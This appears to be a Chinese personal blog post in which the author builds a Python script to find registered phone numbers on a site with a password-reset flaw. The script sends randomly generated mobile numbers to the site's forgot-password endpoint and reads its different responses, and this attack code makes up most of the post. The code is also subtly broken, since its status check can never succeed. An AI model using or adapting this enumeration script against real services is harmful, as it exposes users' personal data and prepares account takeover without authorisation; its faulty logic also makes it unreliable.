学习中,遇到一个某网站找回密码漏洞。但是需要知道注册用户的手机号,随便测试了几个,都是未注册用户,就想着写个脚本找一找。
说干就干,拿出我还没入门的Python,就开始了操作。先抓包分析一下,未注册过的手机号,点击找回密码,返回的 {"status":1,"msg":"\u8be5\u624b\u673a\u53f7\u4e0d\u5b58\u5728\uff0c\u8bf7\u60a8\u786e\u8ba4\u3002"},如图。
而注册过的手机号返回{"status":200,"readerid":"24425713"}
分析完毕,开启coding模式。
# -*- coding:utf-8 -*-
import requests
import random
import re
# 随机生成手机号码
def createPhone():
prelist = ["130","131","132","133","134","135","136","137","138","139","147","150","151","152","153","155","156","157","158","159","186","187","188"]
phone = random.choice(prelist)+"".join(random.choice("0123456789") for i in range(8))
#print phone
getphone(phone)
def getphone(phone):
url="http://www.xxxxxx.net/register/forgot.php?action=checkMobile&mobile="+"".join(phone)
headers = {
"Host": "www.xxxxxx.net",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0",
"Accept": "application/json, text/javascript, */*; q=0.01",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"X-Requested-With": "XMLHttpRequest",
"Referer": "http://www.xxxxxx.net/register/forgot.html",
"Cookie": "td_cookie=18446744071072983388"
}
r = requests.get(url,headers = headers)
html = r.text
#print html
staus = re.findall('status":(.*),',html)
#print staus
if(staus == 200):
print phone
for i in range(1000):
createPhone()
i = i +1
网站用xxxxxx.net代替。结果跑了1000个,都是未注册的。
